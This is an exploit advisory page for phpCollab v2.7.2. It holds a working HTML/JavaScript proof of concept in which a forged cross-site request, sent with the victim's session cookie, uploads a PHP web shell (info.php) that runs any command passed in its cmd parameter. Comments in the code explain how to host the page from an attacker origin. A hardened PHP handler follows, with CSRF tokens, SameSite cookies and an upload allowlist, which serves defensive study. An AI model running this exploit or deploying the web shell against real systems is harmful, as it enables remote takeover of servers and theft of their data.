phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script

2020.04.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#/
#* phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script
#* Author : Trung Le
#* Tutorial Video : https://youtu.be/BLFbUJ4n8hY
#* Twitter : @lethanhtrungdbp
#* Facebook : fb.com/c0nc4nh0
#/

<!DOCTYPE html>
<html>
<title>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</title>
<body>
<script type="text/javascript">
function upload(){
  var xhr = new XMLHttpRequest();
  // Serve this page from an attacker-controlled origin and point the URL at the
  // victim's phpCollab install (an absolute URL when hosted cross-site).
  xhr.open("POST", "/phpcol/clients/editclient.php?action=add&", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
  // The boundary in the Content-Type header must be the same value used between
  // the parts below; the listing as published used two different values, which a
  // multipart parser rejects.
  var boundary = "---------------------------11872893914229319724059542750";
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
  // Send the logged-in victim's phpCollab session cookie with the forged request.
  xhr.withCredentials = true;
  var delim = "--" + boundary + "\r\n";
  var body = delim +
    "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
    "\r\n" +
    "100000000\r\n" + delim +
    "Content-Disposition: form-data; name=\"owner\"\r\n" +
    "\r\n" +
    "1\r\n" + delim +
    "Content-Disposition: form-data; name=\"name\"\r\n" +
    "\r\n" +
    "100\r\n" + delim +
    "Content-Disposition: form-data; name=\"address\"\r\n" +
    "\r\n" +
    "\r\n" + delim +
    "Content-Disposition: form-data; name=\"phone\"\r\n" +
    "\r\n" +
    "\r\n" + delim +
    "Content-Disposition: form-data; name=\"url\"\r\n" +
    "\r\n" +
    "\r\n" + delim +
    "Content-Disposition: form-data; name=\"email\"\r\n" +
    "\r\n" +
    "\r\n" + delim +
    "Content-Disposition: form-data; name=\"comments\"\r\n" +
    "\r\n" +
    "\r\n" + delim +
    "Content-Disposition: form-data; name=\"hourly_rate\"\r\n" +
    "\r\n" +
    "0.00\r\n" + delim +
    // The "upload" part carries the payload: a minimal PHP web shell named info.php
    // that runs whatever is passed in ?cmd= (long-form <?php tag so it also runs
    // where short_open_tag is disabled).
    "Content-Disposition: form-data; name=\"upload\"; filename=\"info.php\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "<HTML><BODY>\r\n" +
    "<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\r\n" +
    "<INPUT TYPE=\"text\" NAME=\"cmd\">\r\n" +
    "<INPUT TYPE=\"submit\" VALUE=\"Send\">\r\n" +
    "</FORM>\r\n" +
    "<pre>\r\n" +
    "<?php\r\n" +
    "if(isset($_GET['cmd'])) {\r\n" +
    " system($_GET['cmd']);\r\n" +
    " }\r\n" +
    "?>\r\n" +
    "</pre>\r\n" +
    "</BODY></HTML>\r\n" +
    "\r\n" +
    "\r\n" +
    "\r\n" +
    "--" + boundary + "--\r\n";
  // Send the body byte-for-byte so the browser does not re-encode it.
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
<h3>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</h3>
<form action="#">
<button type="button" onclick="upload()">phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</button>
</form><br />
<iframe style="border:2px;border-style:dashed;color:#d3d3d3" srcdoc="command output frame" width="700" height="600" name="ZSL_iframe"> </iframe>
<br />
<font size="2" color="#d3d3d3">ZSL-2016-5328</font>
</body>
</html>
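The PoC above relies on two weaknesses working together: editclient.php?action=add accepts a POST from another origin without any anti-CSRF token, and the "upload" field is stored under its client-supplied name (info.php) somewhere the web server executes it as PHP. The following handler is an added illustration written for this page, not phpCollab's own code, of how a form handler closes both gaps. The field names name, owner and upload are taken from the PoC request; the token name csrf_token, the allowlist, the storage path and the helper names are hypothetical choices.

```php
<?php
// Added illustration (not phpCollab code) of a hardened "add client" handler.
// Field names (name, owner, upload) follow the PoC request; token name, allowlist,
// UPLOAD_DIR and helper names are hypothetical.
declare(strict_types=1);

// Defense in depth: a SameSite session cookie is not sent on cross-site POSTs,
// so the forged XHR arrives without the victim's session even before the token
// check runs (PHP 7.3+ accepts the samesite option).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// --- 1. Anti-CSRF: a per-session random token, embedded in the form and
//        compared in constant time on every state-changing request.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// --- 2. Upload validation: allowlist extension AND sniffed MIME type, store
//        under a server-chosen name outside the web root. The client-supplied
//        filename and Content-Type (info.php / application/octet-stream in the
//        PoC) are never trusted.
const ALLOWED = ['pdf' => 'application/pdf', 'png' => 'image/png', 'jpg' => 'image/jpeg'];
const UPLOAD_DIR = '/var/lib/phpcollab-files'; // hypothetical path outside DocumentRoot

function store_upload(array $file): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return null; // rejects .php, .phtml, .phar, ... whatever Content-Type claims
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]) {
        return null; // extension and actual content disagree
    }
    // Random server-chosen name: no user-controlled path component reaches the disk.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_GET['action'] ?? '') === 'add') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    $stored = isset($_FILES['upload']) ? store_upload($_FILES['upload']) : null;
    if (isset($_FILES['upload']) && $stored === null) {
        http_response_code(400);
        exit('upload rejected');
    }
    // ... create the client record (name, owner, ...) and reference $stored ...
}
?>
<form method="post" enctype="multipart/form-data" action="editclient.php?action=add">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="name">
  <input type="file" name="upload">
  <button type="submit">Add client</button>
</form>
```

Against this handler the PoC fails twice: the forged multipart body carries no csrf_token part, so the request is refused with 403, and even a request that somehow obtained a valid token could not land info.php, because the extension is not on the allowlist and the file would in any case be renamed and written outside the web root. The SameSite cookie setting is worth adding even though current browsers default to Lax, since the PoC's xhr.withCredentials = true only helps the attacker when the session cookie is actually attached to a cross-site POST.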

References:

https://www.baomatcoban.info/2020/04/funnymini0day-phpcollab-v272-rce-via.html


Copyright 2024, cxsecurity.com